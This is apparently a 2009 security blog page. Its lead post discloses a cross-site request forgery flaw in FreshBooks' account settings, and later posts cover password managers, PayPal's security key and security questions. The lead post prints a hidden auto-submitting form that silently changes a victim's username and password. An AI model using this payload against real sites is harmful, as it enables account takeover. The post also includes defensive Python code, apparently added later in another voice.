Category: Authentication

May 03 2009

FreshBooks – Signup to Exploit in 5 minutes

I have run into this particular issue a lot in the past few weeks. It’s like the new generation of web developers have forgotten about security principles (must be a web 2.0 thing.) For an example of this particular issue, I will use a zero day vulnerability in the popular time tracking / invoicing app FreshBooks. This vulnerability literally took only 5 minutes to identify. It has to make one think about the level of effort these web app companies really put into security, I know it makes me think twice about giving somebody else control of my information.

Now for the fun stuff. I will explain below how a user with a logged-in FreshBooks session who visits a malicious website could have their account credentials (username, password) changed in such a manner that they would not know immediately, giving the attacker full control.

It’s all about verifiable trust

Web applications, especially ones that are password protected, rely on the fact that your browser will send the session ID with every browser request. This is a very important design consideration for web app developers designing privileged sections/actions of the application.

For example, if a web app developer designs with the mentality “a user has to be logged in (has a valid session) to change their password or do any other privileged activities,” then not only is the logged-in user able to perform those actions, but any other page they visit can make their browser send those same requests too. All because of the designed browser behaviour of sending your session with every request. This is session-based trust.

What we need to solve this is transaction-based trust. The client has to prove not only that it is allowed from an authentication perspective, but that it is authorized to make this particular transaction. Now the important part.

For a password change, the old password should be provided and verified server side. For other privileged operations, other tokens and methods can be used.
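To make the difference between the two trust models concrete, here is an added example (my own illustration, not FreshBooks code; the in-memory account store, session record and form field names are assumptions) that puts a session-only password change handler next to a transactional one. The transactional handler requires the old password and a per-session token that only the site's own form carries, so a request the browser was made to send from elsewhere fails even though the session cookie went along with it.

```python
"""Session-based vs transaction-based trust for a password change (added example)."""
import hashlib
import hmac
import secrets
from typing import Optional, Tuple


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 so the stored value is never the plaintext password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def create_account(username: str, password: str) -> dict:
    """Constructed in-memory account record (assumption: no real database)."""
    salt = secrets.token_bytes(16)
    return {"username": username, "salt": salt, "pw_hash": hash_password(password, salt)}


def create_session(account: dict) -> dict:
    """Server-side session, looked up by the cookie the browser sends back.
    The csrf_token is rendered only into the site's own forms, never into a cookie."""
    return {
        "session_id": secrets.token_urlsafe(32),
        "account": account,
        "csrf_token": secrets.token_urlsafe(32),
    }


def verify_password(account: dict, candidate: str) -> bool:
    """Constant-time comparison of the candidate against the stored hash."""
    return hmac.compare_digest(account["pw_hash"], hash_password(candidate, account["salt"]))


def change_password_session_only(session: Optional[dict], form: dict) -> Tuple[bool, str]:
    """The design the post criticises: a valid session is the only check made."""
    if session is None:
        return False, "not logged in"
    if form.get("admin_password") != form.get("admin_password2"):
        return False, "passwords do not match"
    acct = session["account"]
    acct["pw_hash"] = hash_password(form["admin_password"], acct["salt"])
    return True, "password changed"


def change_password_transactional(session: Optional[dict], form: dict) -> Tuple[bool, str]:
    """Transaction-based trust: authenticate the session AND authorise this request."""
    if session is None:
        return False, "not logged in"
    # 1. The request must carry the token that only the site's own form contained.
    if not hmac.compare_digest(form.get("csrf_token", ""), session["csrf_token"]):
        return False, "missing or invalid transaction token"
    # 2. The old password must be supplied and verified server side.
    if not verify_password(session["account"], form.get("old_password", "")):
        return False, "old password incorrect"
    if form.get("admin_password") != form.get("admin_password2"):
        return False, "passwords do not match"
    acct = session["account"]
    acct["pw_hash"] = hash_password(form["admin_password"], acct["salt"])
    return True, "password changed"


def demo() -> dict:
    """Run both handlers against a request built off-site and one from the real form."""
    results = {}
    # Off-site request: the browser attaches the session, but the page that built
    # the form knows neither the old password nor the session's token.
    cross_site_form = {"admin_password": "attacker-chosen", "admin_password2": "attacker-chosen"}

    acct = create_account("joe", "correct horse")
    session = create_session(acct)
    results["session_only_cross_site"] = change_password_session_only(session, cross_site_form)[0]

    acct = create_account("joe", "correct horse")
    session = create_session(acct)
    results["transactional_cross_site"] = change_password_transactional(session, cross_site_form)[0]

    legit_form = {  # what the site's own form submits
        "csrf_token": session["csrf_token"],
        "old_password": "correct horse",
        "admin_password": "new pass",
        "admin_password2": "new pass",
    }
    results["transactional_legit"] = change_password_transactional(session, legit_form)[0]
    results["new_password_works"] = verify_password(acct, "new pass")
    results["old_password_rejected"] = verify_password(acct, "correct horse")
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The session-only handler accepts the off-site request, the transactional one rejects it, and the same transactional handler still accepts the genuine submission. Both checks are independent: the old-password check protects the credential change itself, while the per-session token is the kind of "other token" the post mentions for privileged operations that have no password to re-verify.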

Tell me how to exploit FreshBooks already!

As you might have guessed by now, FreshBooks does not ask for the old password when setting account information, trusting only session authentication, which is a bad design flaw. They ask for first name, last name, email address, username, new password and verify password. They also don’t deploy any other protection mechanisms (which I’m not going to get into here.) So when the FreshBooks user fills out the form and presses Save, the server takes what the user sent, verifies the session is good and saves the info. No other verification is done.

[Image: FreshBooks account form]

Most of you won’t care, but this is the code that makes up the form in the background (in essence anyway.)

<form name="csrf" action="https://xxxxxx.freshbooks.com/menu.php?route=usernameAndPass" method="post" target="hidden">
<input type="text" name="fname" value="Joe" />
<input type="text" name="lname" value="Schmoe" />
<input type="text" name="email" value="adam@ngenuity-is.com" />
<input type="text" name="rate" value="0.00" />
<input type="text" name="admin_username" value="USERNAME" />
<input type="password" name="admin_password" value="PASSHERE" />
<input type="password" name="admin_password2" value="PASSHERE" />
<input type="submit" name="save" />
</form>

This should be pretty straightforward as to what each piece is when compared to the above image. A quick addition of <script>document.csrf.submit();</script> and the browser executes the code for us with no human interaction. Throw all of this (with a few more important details you have to figure out yourself) on a website and you have a nice little, targeted exploit.

All of this could have been avoided if FreshBooks had simply asked the user for their old password and verified it. Sure, there are technical controls they can put in place to protect against some of these things, but really this should have been caught during a design assessment of the application.

Special thanks to Adam Brault for helping me test the exploit outside of the lab and agreeing to be pwned.

Dec 18 2008

New Year Resolution: Change All Your Passwords

If you can actually remember all of the places you signed up for accounts over the years, and the unique passwords for those accounts, you can stop reading this now.

All the rest of you still reading should know that passwords are an important part of keeping prying eyes from your data (and probably have just as hard of a time remembering passwords as I do.) Passwords are very similar to a combination for a safe. Know the right combination and it is easy to obtain the contents. If you don’t happen to know the combination, you could try a whole bunch of combinations in succession and eventually get the right one. The key word there is eventually. While there are other limiting factors such as frequency of guesses and other controls that I’m going to ignore for the sake of this introduction, passwords for the most part protect against time. The more complex the password, the more difficult it is to guess, and the longer it should supposedly take to obtain the right one.

Make password management easy on yourself and get a password safe application like Password Gorilla. If you are wondering why you need one of these applications, here are just a few reasons.

  • Remembers your passwords for you (in an encrypted vault!)
  • Passwords can be as complex and long as you want them to be.
  • You have a convenient list of passwords so that when the New Year comes around you can change them, all of them.
  • You can keep information, such as answers to “security questions”, in the notes field. You don’t have to use answers like “What is the name of your first pet? Max.” Instead, make them just as complex as your passwords.
  • Password Gorilla is cross-platform and works on Windows, OS X and Unix systems. No excuses here!

We all know you aren’t going to go to the gym like you need to, so why not pick a New Year resolution that is attainable, like caring about strong password management, one of the most basic principles in security.

Sep 23 2008

PayPal Security Key Only $5

This is a fantastic deal that PayPal and eBay should be seriously promoting. PayPal and eBay are both giant phishing targets. They have been offering a 2 factor authentication token for a while now. The cost to you: $5. Includes shipping, no other costs, no hidden fees and it’s easy to use. I highly recommend anybody with a PayPal or eBay account get one immediately.

Find out more here:
https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/PPSecurityKey-outside

Side Note:
If you are in the Tri-Cities, WA area and want to learn more about Phishing (and other security topics) come to the DC509, National Cyber Security Month Event being held in October. Aaron Howell from nGenuity will be presenting on Phishing. I will post more information as the event nears.

Jul 25 2008

The Press: Information Jackpot

Entrepreneurs love media attention for themselves and their business. Any chance to get on television or in a publication is quickly jumped upon. The July edition of the Tri-Cities Area Journal of Business features a new section that focuses on young entrepreneurs, asking questions such as “Toughest career obstacle or decision” and “[what are your] lifetime goals?” You might be thinking, “What does this have to do with security?” It conveniently relates quite nicely to what I want to talk about: security questions and answers.

Security questions are those questions that you get asked when you want to reset your password, or maybe even to log into a web site. They are typically simple questions that, hopefully, only you know the answer to.

Some common questions are:

  • What city were you born in?
  • What is the name of a pet or the name of your first pet?
  • Favorite Movie
  • Favorite song / book
  • … and many other variations.

The problem with security questions is that the answers to them are quite often easily discovered information. Take the Journal of Business young entrepreneurs section. It offers a wealth of information that might be used.

Answers are typically less complex than a typical password, injecting additional weaknesses into the security of your account. Why force a secure password when you don’t force a secure security question? Why are we giving up this information to the sites we log into every day? Because they asked for it, that’s why. We want access to the site and want the ability to reset our password or whatever other functionality the site has tied to the question/answer.

The solution is quite easy. Do not provide the real information. Generate a random answer and document that the same way you would your password. I recommend Password Gorilla, but there are many password archive applications out there to help you manage this.

As an aside, those of you who are being interviewed for publications: do your homework first before providing information to somebody who says they are a reporter or journalist. One great social engineering method is to pose as the press to gain information. People love to talk to the press.
